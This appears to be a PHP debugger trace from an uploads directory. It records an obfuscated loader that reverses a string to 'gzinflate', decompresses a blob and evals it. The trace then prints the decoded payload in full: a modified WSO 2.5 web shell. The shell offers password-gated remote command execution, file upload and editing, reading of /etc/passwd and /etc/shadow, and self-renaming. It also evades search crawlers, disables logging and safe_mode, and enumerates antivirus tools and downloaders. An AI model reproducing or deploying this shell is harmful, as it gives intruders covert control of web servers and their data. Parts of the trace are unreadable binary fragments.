3 11 R '�}m{�6\022�g�y�\037`V[J�,Kr��J��l�lrM��l�g�TZ�$�\022���\0357��~3�w��r���=�6�H\f\006\003`0\030\f\006�����믶���_}���W_U\v���\001sRo\022�\026�\037\f���"��Ի�\a��*\032ga\034���h��Ǟ?Zx\037G�p\036��o\001���^D�8�(A�t��}����$^\006\021���ٲ\005�M��m@r8�\003D�}\002�&�I�\005��dH\024�oM��8����\031\t�\\a�\006Y�6z|zv�g���v�^6\032_��\000\002\t\034\005\037�4K���rg\034G�p�\002\n�F�\005�Y�ܟ\002o6��\022�����\037�\020�/�u`�͒pQ\002��\a�u\001l\v�j\vl�+/\r"o\001�N�N�utr�>?y��l��w��\036A�>��Ws�@DO�l\004�fA\004�'
2 A /var/www/html/uploads/masters.php 26 $filter = '�}m{�6\022�g�y�\037`V[J�,Kr��J��l�lrM��l�g�TZ�$�\022���\0357��~3�w��r���=�6�H\f\006\003`0\030\f\006�����믶���_}���W_U\v���\001sRo\022�\026�\037\f���"��Ի�\a��*\032ga\034���h��Ǟ?Zx\037G�p\036��o\001���^D�8�(A�t��}����$^\006\021���ٲ\005�M��m@r8�\003D�}\002�&�I�\005��dH\024�oM��8����\031\t�\\a�\006Y�6z|zv�g���v�^6\032_��\000\002\t\034\005\037�4K���rg\034G�p�\002\n�F�\005�Y�ܟ\002o6��\022�����\037�\020�/�u`�͒pQ\002��\a�u\001l\v�j\vl�+/\r"o\001�N�N�utr�>?y��l��w��\036A�>��Ws�@DO�l\004�fA\004�'
3 12 0 0.001727 507424 strrev 0 /var/www/html/uploads/masters.php 27 1 'etalfnizg'
3 12 1 0.001749 507496
3 12 R 'gzinflate'
2 A /var/www/html/uploads/masters.php 27 $preparefunc = 'gzinflate'
3 13 0 0.001790 507464 gzinflate 0 /var/www/html/uploads/masters.php 28 1 '�}m{�6\022�g�y�\037`V[J�,Kr��J��l�lrM��l�g�TZ�$�\022���\0357��~3�w��r���=�6�H\f\006\003`0\030\f\006�����믶���_}���W_U\v���\001sRo\022�\026�\037\f���"��Ի�\a��*\032ga\034���h��Ǟ?Zx\037G�p\036��o\001���^D�8�(A�t��}����$^\006\021���ٲ\005�M��m@r8�\003D�}\002�&�I�\005��dH\024�oM��8����\031\t�\\a�\006Y�6z|zv�g���v�^6\032_��\000\002\t\034\005\037�4K���rg\034G�p�\002\n�F�\005�Y�ܟ\002o6��\022�����\037�\020�/�u`�͒pQ\002��\a�u\001l\v�j\vl�+/\r"o\001�N�N�utr�>?y��l��w��\036A�>��Ws�@DO�l\004�fA\004�'
3 13 1 0.002405 564840
3 13 R '\r\n/*\r\n\tMod\r\n*/\r\n\r\n$ini = "safe_mode=off\\ndisable_functions=\\nupload_max_filesize = 10M\\npost_max_size = 10M";\r\n$ht = @fopen (\'php.ini\',\'w\');\r\nif($ht) {\r\n\tfwrite($ht, $ini);\r\n\tfclose($ht);\r\n}\r\n\r\n\r\nif(isset($_POST[\'checkwp\']))\r\n{\r\n\tif(file_exists(\'wp-config.php\')) echo \'Yeahhh\';\r\n}\r\n\r\nif(isset($_REQUEST[\'joke\']))\r\n{\r\n\tif(trim($_REQUEST[\'joke\']) != \'\')\r\n\t{\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($m'
2 6 1 0.002604 523768
2 6 R '\r\n/*\r\n\tMod\r\n*/\r\n\r\n$ini = "safe_mode=off\\ndisable_functions=\\nupload_max_filesize = 10M\\npost_max_size = 10M";\r\n$ht = @fopen (\'php.ini\',\'w\');\r\nif($ht) {\r\n\tfwrite($ht, $ini);\r\n\tfclose($ht);\r\n}\r\n\r\n\r\nif(isset($_POST[\'checkwp\']))\r\n{\r\n\tif(file_exists(\'wp-config.php\')) echo \'Yeahhh\';\r\n}\r\n\r\nif(isset($_REQUEST[\'joke\']))\r\n{\r\n\tif(trim($_REQUEST[\'joke\']) != \'\')\r\n\t{\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($m'
1 A /var/www/html/uploads/masters.php 62 $wpautop = '\r\n/*\r\n\tMod\r\n*/\r\n\r\n$ini = "safe_mode=off\\ndisable_functions=\\nupload_max_filesize = 10M\\npost_max_size = 10M";\r\n$ht = @fopen (\'php.ini\',\'w\');\r\nif($ht) {\r\n\tfwrite($ht, $ini);\r\n\tfclose($ht);\r\n}\r\n\r\n\r\nif(isset($_POST[\'checkwp\']))\r\n{\r\n\tif(file_exists(\'wp-config.php\')) echo \'Yeahhh\';\r\n}\r\n\r\nif(isset($_REQUEST[\'joke\']))\r\n{\r\n\tif(trim($_REQUEST[\'joke\']) != \'\')\r\n\t{\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($m'
2 14 0 0.004928 1001840 eval 1 '\r\n/*\r\n\tMod\r\n*/\r\n\r\n$ini = "safe_mode=off\\ndisable_functions=\\nupload_max_filesize = 10M\\npost_max_size = 10M";\r\n$ht = @fopen (\'php.ini\',\'w\');\r\nif($ht) {\r\n\tfwrite($ht, $ini);\r\n\tfclose($ht);\r\n}\r\n\r\n\r\nif(isset($_POST[\'checkwp\']))\r\n{\r\n\tif(file_exists(\'wp-config.php\')) echo \'Yeahhh\';\r\n}\r\n\r\nif(isset($_REQUEST[\'joke\']))\r\n{\r\n\tif(trim($_REQUEST[\'joke\']) != \'\')\r\n\t{\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($me);\r\n\t\t$z0r = str_replace($wp_nonce, md5(trim($_REQUEST[\'joke\'])), $lul);\r\n\t\t$lol = fopen($me, "w");\r\n\t\tfwrite($lol, $z0r);\r\n\t\tfclose($lol);\r\n\t\tif(stristr(file_get_contents($me), md5(trim($_REQUEST[\'joke\']))))\r\n\t\t{\r\n\t\t\techo \'passwordchanged\';\r\n\t\t} else {\r\n\t\t\techo \'fail\';\r\n\t\t}\r\n\t}\r\n\texit;\r\n}\r\nif(isset($_REQUEST[\'newname\']))\r\n{\r\n\tif(trim($_REQUEST[\'newname\']) != \'\') \r\n\t{\r\n\t\t$name = trim($_REQUEST[\'newname\']).\'.php\';\r\n\t\t$me = basename($_SERVER[\'SCRIPT_FILENAME\']);\r\n\t\t$lul = file_get_contents($me);\r\n\t\t$lol = fopen($name, "w");\r\n\t\tfwrite($lol, $lul);\r\n\t\tfclose($lol);\r\n\t\tif(file_exists($name))\r\n\t\t{\r\n\t\t\tunlink($me);\r\n\t\t\techo \'v0ld3m0rt:\'.$name.\':v0ld3m0rt\';\r\n\t\t}\r\n\t}\r\n\texit;\r\n}\r\n/*\r\n\tEnd Mod\r\n*/\r\n\r\n$color = "#00ff00";\r\n$default_action = \'FilesMan\';\r\n$default_use_ajax = true;\r\n$default_charset = \'Windows-1251\';\r\n\r\nif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\r\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\r\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\r\n header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n }\r\n}\r\n\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@set_time_limit(0);\r\nif(function_exists(\'set_magic_quotes_runtime\')) @set_magic_quotes_runtime(0);\r\n@define(\'WSO_VERSION\', \'2.5\');\r\n\r\nif(get_magic_quotes_gpc()) {\r\n\tfunction WSOstripslashes($array) {\r\n\t\treturn is_array($array) ? array_map(\'WSOstripslashes\', $array) : stripslashes($array);\r\n\t}\r\n\t$_POST = WSOstripslashes($_POST);\r\n $_COOKIE = WSOstripslashes($_COOKIE);\r\n}\r\n\r\nfunction wsoLogin() {\r\n\tdie("<center><form method=post>Password: <input type=password name=pass><input type=submit value=\'>>\'></form></center>");\r\n}\r\n\r\nfunction WSOsetcookie($k, $v) {\r\n $_COOKIE[$k] = $v;\r\n setcookie($k, $v);\r\n}\r\n\r\nif(!empty($wp_nonce)) {\r\n if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $wp_nonce))\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']), $wp_nonce);\r\n\r\n if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $wp_nonce))\r\n wsoLogin();\r\n}\r\n\r\nif(strtolower(substr(PHP_OS,0,3)) == "win")\r\n\t$os = \'win\';\r\nelse\r\n\t$os = \'nix\';\r\n\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n error_reporting(0);\r\n\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n\t@chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n\t$home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n\t$cwd = str_replace("\\\\", "/", $cwd);\r\n}\r\nif($cwd[strlen($cwd)-1] != \'/\')\r\n\t$cwd .= \'/\';\r\n\r\nif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$default_use_ajax;\r\n\r\nfunction wsoHeader() {\r\n\tif(empty($_POST[\'charset\']))\r\n\t\t$_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\r\n\tglobal $color;\r\n\techo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . WSO_VERSION ."</title>\r\n<style>\r\nbody{background-color:#444;color:#e1e1e1;}\r\nbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\r\ntable.info{ color:#fff;background-color:#222; }\r\nspan,h1,a{ color: $color !important; }\r\nspan{ font-weight: bolder; }\r\nh1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\r\ndiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\r\na{ text-decoration:none; }\r\na:hover{ text-decoration:underline; }\r\n.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\r\n.bigarea{ width:100%;height:300px; }\r\ninput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,\'Courier New\'; }\r\nform{ margin:0px; }\r\n#toolsTbl{ text-align:center; }\r\n.toolsInp{ width: 300px }\r\n.main th{text-align:left;background-color:#5e5e5e;}\r\n.main tr:hover{background-color:#5e5e5e}\r\n.l1{background-color:#444}\r\n.l2{background-color:#333}\r\npre{font-family:Courier,Monospace;}\r\n</style>\r\n<script>\r\n var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\r\n var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'\r\n var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\r\n var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';\r\n var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';\r\n var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';\r\n var d = document;\r\n\tfunction set(a,c,p1,p2,p3,charset) {\r\n\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\r\n\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\r\n\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\r\n\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\r\n\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\r\n\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\r\n\t}\r\n\tfunction g(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\td.mf.submit();\r\n\t}\r\n\tfunction a(a,c,p1,p2,p3,charset) {\r\n\t\tset(a,c,p1,p2,p3,charset);\r\n\t\tvar params = \'ajax=true\';\r\n\t\tfor(i=0;i<d.mf.elements.length;i++)\r\n\t\t\tparams += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);\r\n\t\tsr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);\r\n\t}\r\n\tfunction sr(url, params) {\r\n\t\tif (window.XMLHttpRequest)\r\n\t\t\treq = new XMLHttpRequest();\r\n\t\telse if (window.ActiveXObject)\r\n\t\t\treq = new ActiveXObject(\'Microsoft.XMLHTTP\');\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n req.open(\'POST\', url, true);\r\n req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');\r\n req.send(params);\r\n }\r\n\t}\r\n\tfunction processReqChange() {\r\n\t\tif( (req.readyState == 4) )\r\n\t\t\tif(req.status == 200) {\r\n\t\t\t\tvar reg = new RegExp(\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\", \'m\');\r\n\t\t\t\tvar arr=reg.exec(req.responseText);\r\n\t\t\t\teval(arr[2].substr(0, arr[1]));\r\n\t\t\t} else alert(\'Request error!\');\r\n\t}\r\n</script>\r\n<head><body><div style=\'position:absolute;width:100%;background-color:#444;top:0;left:0;\'>\r\n<form method=post name=mf style=\'display:none;\'>\r\n<input type=hidden name=a>\r\n<input type=hidden name=c>\r\n<input type=hidden name=p1>\r\n<input type=hidden name=p2>\r\n<input type=hidden name=p3>\r\n<input type=hidden name=charset>\r\n</form>";\r\n\t$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n\t$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n\t$totalSpace = $totalSpace?$totalSpace:1;\r\n\t$release = @php_uname(\'r\');\r\n\t$kernel = @php_uname(\'s\');\r\n\t$explink = \'http://exploit-db.com/search/?action=search&filter_description=\';\r\n\tif(strpos(\'Linux\', $kernel) !== false)\r\n\t\t$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n\telse\r\n\t\t$explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n\tif(!function_exists(\'posix_getegid\')) {\r\n\t\t$user = @get_current_user();\r\n\t\t$uid = @getmyuid();\r\n\t\t$gid = @getmygid();\r\n\t\t$group = "?";\r\n\t} else {\r\n\t\t$uid = @posix_getpwuid(posix_geteuid());\r\n\t\t$gid = @posix_getgrgid(posix_getegid());\r\n\t\t$user = $uid[\'name\'];\r\n\t\t$uid = $uid[\'uid\'];\r\n\t\t$group = $gid[\'name\'];\r\n\t\t$gid = $gid[\'gid\'];\r\n\t}\r\n\r\n\t$cwd_links = \'\';\r\n\t$path = explode("/", $GLOBALS[\'cwd\']);\r\n\t$n=count($path);\r\n\tfor($i=0; $i<$n-1; $i++) {\r\n\t\t$cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n\t\tfor($j=0; $j<=$i; $j++)\r\n\t\t\t$cwd_links .= $path[$j].\'/\';\r\n\t\t$cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n\t}\r\n\r\n\t$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n\t$opt_charsets = \'\';\r\n\tforeach($charsets as $item)\r\n\t\t$opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n\r\n\t$m = array(\'Sec. Info\'=>\'SecInfo\',\'Mail Test\'=>\'MailTest\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\');\r\n\tif(!empty($GLOBALS[\'wp_nonce\']))\r\n\t\t$m[\'Logout\'] = \'Logout\';\r\n\t$m[\'Self remove\'] = \'SelfRemove\';\r\n\t$menu = \'\';\r\n\tforeach($m as $k => $v)\r\n\t\t$menu .= \'<th width="\'.(int)(100/count($m)).\'%">[ <a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a> ]</th>\';\r\n\r\n\t$drives = "";\r\n\tif($GLOBALS[\'os\'] == \'win\') {\r\n\t\tforeach(range(\'c\',\'z\') as $drive)\r\n\t\tif(is_dir($drive.\':\\\\\'))\r\n\t\t\t$drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n\t}\r\n\techo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\') . \'</span></td>\'\r\n . \'<td><nobr>\' . substr(@php_uname(), 0, 120) . \' <a href="\' . $explink . \'" target=_blank>[exploit-db.com]</a></nobr><br>\' . $uid . \' ( \' . $user . \' ) <span>Group:</span> \' . $gid . \' ( \' . $group . \' )<br>\' . @phpversion() . \' <span>Safe mode:</span> \' . ($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=green><b>OFF</b></font>\')\r\n . \' <a href=# onclick="g(\\\'Php\\\',null,\\\'\\\',\\\'info\\\')">[ phpinfo ]</a> <span>Datetime:</span> \' . date(\'Y-m-d H:i:s\') . \'<br>\' . wsoViewSize($totalSpace) . \' <span>Free:</span> \' . wsoViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)<br>\' . $cwd_links . \' \'. wsoPermsColor($GLOBALS[\'cwd\']) . \' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\' . $GLOBALS[\'home_cwd\'] . \'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a><br>\' . $drives . \'</td>\'\r\n . \'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">\' . $opt_charsets . \'</optgroup></select><br><span>Server IP:</span><br>\' . @$_SERVER["SERVER_ADDR"] . \'<br><span>Client IP:</span><br>\' . $_SERVER[\'REMOTE_ADDR\'] . \'</nobr></td></tr></table>\'\r\n . \'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>\' . $menu . \'</tr></table><div style="margin:5">\';\r\n}\r\n\r\nfunction wsoFooter() {\r\n\t$is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'green\'>(Writeable)</font>":" <font color=red>(Not writable)</font>";\r\n echo "\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style=\'border-top:2px solid #333;border-bottom:2px solid #333;\'>\r\n\t<tr>\r\n\t\t<td><form onsubmit=\'g(null,this.c.value,\\"\\");return false;\'><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'>>\'></form></td>\r\n\t\t<td><form onsubmit=\\"g(\'FilesTools\',null,this.f.value);return false;\\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;\\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d><input type=submit value=\'>>\'></form></td>\r\n\t\t<td><form onsubmit=\\"g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;\\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\r\n\t</tr><tr>\r\n\t\t<td><form onsubmit=\\"g(\'Console\',null,this.c.value);return false;\\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'>>\'></form></td>\r\n\t\t<td><form method=\'post\' ENCTYPE=\'multipart/form-data\'>\r\n\t\t<input type=hidden name=a value=\'FilesMAn\'>\r\n\t\t<input type=hidden name=c value=\'" . $GLOBALS[\'cwd\'] ."\'>\r\n\t\t<input type=hidden name=p1 value=\'uploadFile\'>\r\n\t\t<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\r\n\t\t<span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f><input type=submit value=\'>>\'></form><br ></td>\r\n\t</tr></table></div></body></html>";\r\n}\r\n\r\nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) {\r\n function posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) {\r\n function posix_getgrgid($p) {return false;} }\r\n\r\nfunction wsoEx($in) {\r\n\t$out = \'\';\r\n\tif (function_exists(\'exec\')) {\r\n\t\t@exec($in,$out);\r\n\t\t$out = @join("\\n",$out);\r\n\t} elseif (function_exists(\'passthru\')) {\r\n\t\tob_start();\r\n\t\t@passthru($in);\r\n\t\t$out = ob_get_clean();\r\n\t} elseif (function_exists(\'system\')) {\r\n\t\tob_start();\r\n\t\t@system($in);\r\n\t\t$out = ob_get_clean();\r\n\t} elseif (function_exists(\'shell_exec\')) {\r\n\t\t$out = shell_exec($in);\r\n\t} elseif (is_resource($f = @popen($in,"r"))) {\r\n\t\t$out = "";\r\n\t\twhile(!@feof($f))\r\n\t\t\t$out .= fread($f,1024);\r\n\t\tpclose($f);\r\n\t}\r\n\treturn $out;\r\n}\r\n\r\nfunction wsoViewSize($s) {\r\n if (is_int($s))\r\n $s = sprintf("%u", $s);\r\n \r\n\tif($s >= 1073741824)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n\telseif($s >= 1048576)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n\telseif($s >= 1024)\r\n\t\treturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n\telse\r\n\t\treturn $s . \' B\';\r\n}\r\n\r\nfunction wsoPerms($p) {\r\n\tif (($p & 0xC000) == 0xC000)$i = \'s\';\r\n\telseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n\telseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n\telseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n\telseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n\telseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n\telseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n\telse $i = \'u\';\r\n\t$i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n\t$i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n\t$i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n\t$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n\treturn $i;\r\n}\r\n\r\nfunction wsoPermsColor($f) {\r\n\tif (!@is_readable($f))\r\n\t\treturn \'<font color=#FF0000>\' . wsoPerms(@fileperms($f)) . \'</font>\';\r\n\telseif (!@is_writable($f))\r\n\t\treturn \'<font color=white>\' . wsoPerms(@fileperms($f)) . \'</font>\';\r\n\telse\r\n\t\treturn \'<font color=#25ff00>\' . wsoPerms(@fileperms($f)) . \'</font>\';\r\n}\r\n\r\nfunction wsoScandir($dir) {\r\n if(function_exists("scandir")) {\r\n return scandir($dir);\r\n } else {\r\n $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh)))\r\n $files[] = $filename;\r\n return $files;\r\n }\r\n}\r\n\r\nfunction wsoWhich($p) {\r\n\t$path = wsoEx(\'which \' . $p);\r\n\tif(!empty($path))\r\n\t\treturn $path;\r\n\treturn false;\r\n}\r\n\r\nfunction actionSecInfo() {\r\n\twsoHeader();\r\n\techo \'<h1>Server security information</h1><div class=content>\';\r\n\tfunction wsoSecParam($n, $v) {\r\n\t\t$v = trim($v);\r\n\t\tif($v) {\r\n\t\t\techo \'<span>\' . $n . \': </span>\';\r\n\t\t\tif(strpos($v, "\\n") === false)\r\n\t\t\t\techo $v . \'<br>\';\r\n\t\t\telse\r\n\t\t\t\techo \'<pre class=ml1>\' . $v . \'</pre>\';\r\n\t\t}\r\n\t}\r\n\r\n\twsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n if(function_exists(\'apache_get_modules\'))\r\n wsoSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n\twsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n\twsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n\twsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n\twsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n\twsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n\t$temp=array();\r\n\tif(function_exists(\'mysql_get_client_info\'))\r\n\t\t$temp[] = "MySql (".mysql_get_client_info().")";\r\n\tif(function_exists(\'mssql_connect\'))\r\n\t\t$temp[] = "MSSQL";\r\n\tif(function_exists(\'pg_connect\'))\r\n\t\t$temp[] = "PostgreSQL";\r\n\tif(function_exists(\'oci_connect\'))\r\n\t\t$temp[] = "Oracle";\r\n\twsoSecParam(\'Supported databases\', implode(\', \', $temp));\r\n\techo \'<br>\';\r\n\r\n\tif($GLOBALS[\'os\'] == \'nix\') {\r\n wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\');\r\n wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"shadow\\")\'>[view]</a>":\'no\');\r\n wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) {\r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item)\r\n if(wsoWhich($item))\r\n $temp[] = $item;\r\n wsoSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item)\r\n if(wsoWhich($item))\r\n $temp[] = $item;\r\n wsoSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item)\r\n if(wsoWhich($item))\r\n $temp[] = $item;\r\n wsoSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n wsoSecParam(\'HDD space\', wsoEx(\'df -h\'));\r\n wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n echo \'<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\\\'g(null,null,"5",this.param1.value,this.param2.value);return false;\\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>\';\r\n if (isset ($_POST[\'p2\'], $_POST[\'p3\']) && is_numeric($_POST[\'p2\']) && is_numeric($_POST[\'p3\'])) {\r\n $temp = "";\r\n for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\r\n $uid = @posix_getpwuid($_POST[\'p2\']);\r\n if ($uid)\r\n $temp .= join(\':\',$uid)."\\n";\r\n }\r\n echo \'<br/>\';\r\n wsoSecParam(\'Users\', $temp);\r\n }\r\n }\r\n\t} else {\r\n\t\twsoSecParam(\'OS Version\',wsoEx(\'ver\'));\r\n\t\twsoSecParam(\'Account Settings\',wsoEx(\'net accounts\'));\r\n\t\twsoSecParam(\'User Accounts\',wsoEx(\'net user\'));\r\n\t}\r\n\techo \'</div>\';\r\n\twsoFooter();\r\n}\r\n\r\nfunction 